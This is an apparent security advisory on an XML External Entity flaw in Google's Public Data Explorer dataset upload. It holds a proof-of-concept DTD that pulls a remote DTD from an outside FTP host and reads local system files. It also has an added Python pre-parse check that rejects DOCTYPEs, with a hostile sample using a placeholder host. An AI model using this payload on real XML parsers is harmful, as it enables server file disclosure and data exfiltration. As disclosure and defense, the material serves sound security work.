Google (Public Data) XML External Entity Vulnerability
Background
Extracted from http://googleblog.blogspot.com/2011/02/visualize your own data in google.html
Over the past two years, we’ve made public data easier to find, explore and understand in several ways,
providing unemployment figures, population statistics and world development indicators in search
results, and introducing the Public Data Explorer tool. Together with our data provider partners, we’ve
curated 27 datasets including more than 300 data metrics. You can now use the Public Data Explorer to
visualize everything from labor productivity (OECD) to Internet speed (Ookla) to gender balance in
parliaments (UNECE) to government debt levels (IMF) to population density by municipality (Statistics
Catalonia), with more data being added every week.
Today, we’re opening the Public Data Explorer to your data. We’re making a new data format, the
Dataset Publishing Language (DSPL), openly available, and providing an interface for anyone to upload
their datasets. DSPL is an XML-based format designed from the ground up to support rich, interactive
visualizations like those in the Public Data Explorer. The DSPL language and upload interface are
available in Google Labs.
PoC:
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://foo:bar@192.163.249.65/xxe.txt"> %remote; %param1; ]>
<!ENTITY % payload SYSTEM "file:///etc/">
<!ENTITY % param1 '<!ENTITY % internal SYSTEM "%payload;" >' >
%param1; %internal;
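An added defensive example, not part of this advisory or of Google's code: a pre-parse gate (hypothetical `check_upload` / `parse_dspl_upload`) that flags a DOCTYPE, any entity declaration or any external entity reference in an XML upload such as a DSPL file before the document is handed to the real parser. The sample documents are constructed stand-ins shaped like the PoC above, with a placeholder host rather than the advisory's.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET

class UnsafeXmlError(ValueError):
    """Raised for an upload that carries a DOCTYPE or entity declarations."""

def check_upload(xml_bytes):
    """Return a list of findings (empty when clean) for an XML upload. Uses expat's
    declaration handlers, not a '<!DOCTYPE' substring search, so comments or CDATA cannot hide a DTD."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()
    # Never expand parameter entities: the %remote; / %param1; chain in the
    # PoC relies on them to pull a second DTD from a remote host.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append("DOCTYPE %r (system id %r)" % (name, system_id))
    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter entity" if is_param else "general entity"
        findings.append("%s %r -> %r" % (kind, name, system_id or value))
    def on_external_ref(context, base, system_id, public_id):
        findings.append("external entity reference to %r" % (system_id,))
        return 0  # 0 makes expat abort instead of fetching system_id

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        if not findings:  # malformed XML with no DTD finding to explain it
            findings.append("malformed XML: %s" % exc)
    return findings

def parse_dspl_upload(xml_bytes):
    """Gate an upload with check_upload, then parse it; returns the root tag."""
    findings = check_upload(xml_bytes)
    if findings:
        raise UnsafeXmlError("; ".join(findings))
    return ET.fromstring(xml_bytes).tag

# Constructed samples (hypothetical): a minimal stand-in for a DSPL document
# and a copy shaped like the advisory's PoC, with a placeholder host.
BENIGN_UPLOAD = b"<dspl><info><name><value>demo</value></name></info></dspl>"
HOSTILE_UPLOAD = b"""<!DOCTYPE dspl [
  <!ENTITY % remote SYSTEM "ftp://foo:bar@attacker.invalid/xxe.txt">
  %remote; %param1;
]>
<dspl><info><name><value>demo</value></name></info></dspl>"""
```

Rejecting any DOCTYPE outright is the simplest policy for a format like DSPL that has no legitimate need for one; the handlers also record what was found so the rejection can be logged.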
More:
http://www.securatary.com/Portals/0/Vulnerabilities/Google/Google%20XXE%20Attack.pdf